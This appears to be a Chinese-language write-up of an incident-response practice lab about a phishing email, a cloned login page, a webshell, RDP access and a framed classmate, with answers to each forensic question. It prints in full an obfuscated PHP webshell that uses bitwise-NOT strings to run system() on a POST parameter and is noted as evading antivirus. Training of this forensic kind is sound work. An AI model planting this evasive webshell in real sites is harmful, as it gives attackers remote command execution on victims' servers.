XMCVE-钓鱼邮件

XMCVE-钓鱼邮件

星盟的第一台应急响应实战靶机 细细品鉴

靶机获取方式：https://pan.baidu.com/s/1Y-cb4I7dW2a8NU7Tbx3yUA?pwd=39ja

题目 XMCVE-钓鱼邮件：

jason和H1ck反目成仇，竟黑入服务器窃取数据? 故事反转再反转，谁才是真正的黑客？

题目如下：

攻击者的两台服务器地址
攻击者植入的 WebShell 密码
攻击者登录成功的时间
攻击者修改的文件
攻击者创建的用户
攻击者最后发送的邮件
攻击者是谁

先打开foxmail阅读一下邮件 了解前期概要（同组队友做课题时的离奇失踪 大金额的地下黑暗交易 源码被盗还反被诬陷 究竟是并肩作战还是反目成仇）

1.攻击者的两台服务器地址

查看邮件的过程中看到Jason在一封邮件中发了个网址 说源码被泄露了

打开后是与我们做的网站一样的登录界面 想让我们输入用户名密码的钓鱼网站

所以这封邮件中的ip就是第一台服务器

第二个服务器的ip没找到 只有右键邮件查看源码 可以看到jason发邮件的内网地址

2.攻击者植入的 WebShell 密码

法一：

我们最熟悉的getshell方式 就是文件上传木马然后连接

所以可以搜索uploads保存上传文件的文件夹

在第一个uploads目录下有一个php文件

<?php
$_ = ~("\x9E\x8D\x8D" ."\x9E\x86\xA0" ."\x92\x9E\x8F"
);
$__ = ~("\x8C\x86\x8C" ."\x8B\x9A\x92"
);
$___ = ~("\xA0" ."\xAF\xB0" ."\xAC\xAB"
);
$____ = ~("\x9C" ."\x92\x9B"
);$_($__, [${$___}[$____]]);
?>

用了php的按位取反运算符~ 是一种webshell免杀混淆技术 所以用火绒扫不出来

$_   = ~"\x9E\x8D\x8D\x9E\x86\xA0\x92\x9E\x8F"  = "array_map"
$__  = ~"\x8C\x86\x8C\x8B\x9A\x92"              = "system"
$___ = ~"\xA0\xAF\xB0\xAC\xAB"                  = "_POST"
$____= ~"\x9C\x92\x9B"                          = "cmd"$_($__, [${$___}[$____]]); --> array_map("system", [$_POST["cmd"]]);

免杀原理看大佬文章：[PHP WebShell 免杀之字符串运算 + 动态调用 | 雾島风起時](https://duckpigdog.github.io/2026/04/29/WebShell 免杀之字符串运算 + 动态调用/)

法二：

上传准备好的d盾进行扫描

打开文件 进行解码得到密码是cmd

3.攻击者登录成功的时间

我的理解是 jason通过钓鱼文件拿到我们的账号密码后 登录到了我们的网站并上传了木马 然后读取到我们桌面的文件 知道了RDP的木马 登录远程连接再进行下一步操作

RDP溯源 查看日志

计算机图标(右键)->管理->事件查看器->应用程序和服务日志->Microsoft->Windows->TerminalServices-RemoteConnectionManager->Operational

找到事件1149远程登录（可以用右侧筛选器筛选）确定登录时间和ip

4.攻击者修改的文件

这里有点运气了.... 因为是网站被入侵 所以一直在C:\phpstudy_pro\WWW\sms目录下取证 将修改时间倒叙 看到最后修改的文件init_db.sql 里面正好是栽赃的内容

5.攻击者创建的用户

先看windows端有没有系统用户 win+R输入lusrmgr.msc

没有加$符号的隐藏用户 基本排除所创建的是系统用户

那应该就是服务端的用户 启动小皮发现存在数据库 用自带的工具HeidiSQL进行连接（这里我还试了一下naicat 但是数据库好像只能本地连接）

在C:\phpstudy_pro\WWW\sms\admin下找到数据库的连接密码

连接上后 在admin_login_tbl表中发现两个用户

这时就可以想到数据库的初始化文件.sql 然后发现上一题的答案 Jason修改文件的注释来栽赃

然后在初始化文件中找到如何初始化表admin_login_tbl 其中没有初始化的用户就是被入侵者创建的

所以数据库中的root用户是攻击者创建

6.攻击者最后发送的邮件

这里有点侦探小说的感觉了

梳理一下时间线

时间	事件
5月18日17:15	Jason发送钓鱼邮件 得到网站密码
5月18日19:33	RDP成功远控登录
5月18日19:36	“我”向Jason发送恐吓邮件

（这里我有点不懂噢 为什么木马文件的修改时间是5月16日 可能还是有点细节很难百分百还原实战啦）

推理出 恐吓邮件是Jason通过RDP远控后发送的

7.攻击者是谁

答案：Jason

到了喜闻乐见的剧本杀事件还原的环节啦！！！

导师将我和Jason分到了同一个课题组 一开始Jason还十分热情 主动约我进行线下交流讨论 但是后面逐渐的表现出他真正的面目 课题的事情不断找借口推脱 只有我一个人在推进 在临近解题时还可恶的来压力我 自己不干事还既要也要的（果咩纳塞 有点幻视某人了 还好他不懂什么技术）

之后的一天 王鹏突然发邮件 开始维持了一下表面功夫 后面直接表明出5万买下所有源码 但是被我拒绝了 之后王鹏又找到了Jason 所以Jason对我的态度大变 装模做样的道歉 在草稿箱可以看到我接受了Jason的道歉但是没直接把源码给他 只将管理系统部署在了内网测试服务器上供他了解进度 从而让Jason得到前端的代码 克隆出了一个钓鱼网站骗取账号密码

再然后是技术向啦 上传免杀码拿到shell 就可以拿到源码 但是他继续读取到了桌面的配置文件 发现RDP密码为空 然后RDP远控我的电脑 修改了init_db.sql的注释以及伪造邮件栽赃陷害 最后向导师举报我学术不端 并被导师警告

——————————————————————————————————————————

参考文章：[出题——XMCVE--邮件钓鱼 1 | 雾島风起時](https://duckpigdog.github.io/2026/05/19/XMCVE--邮件钓鱼 1/)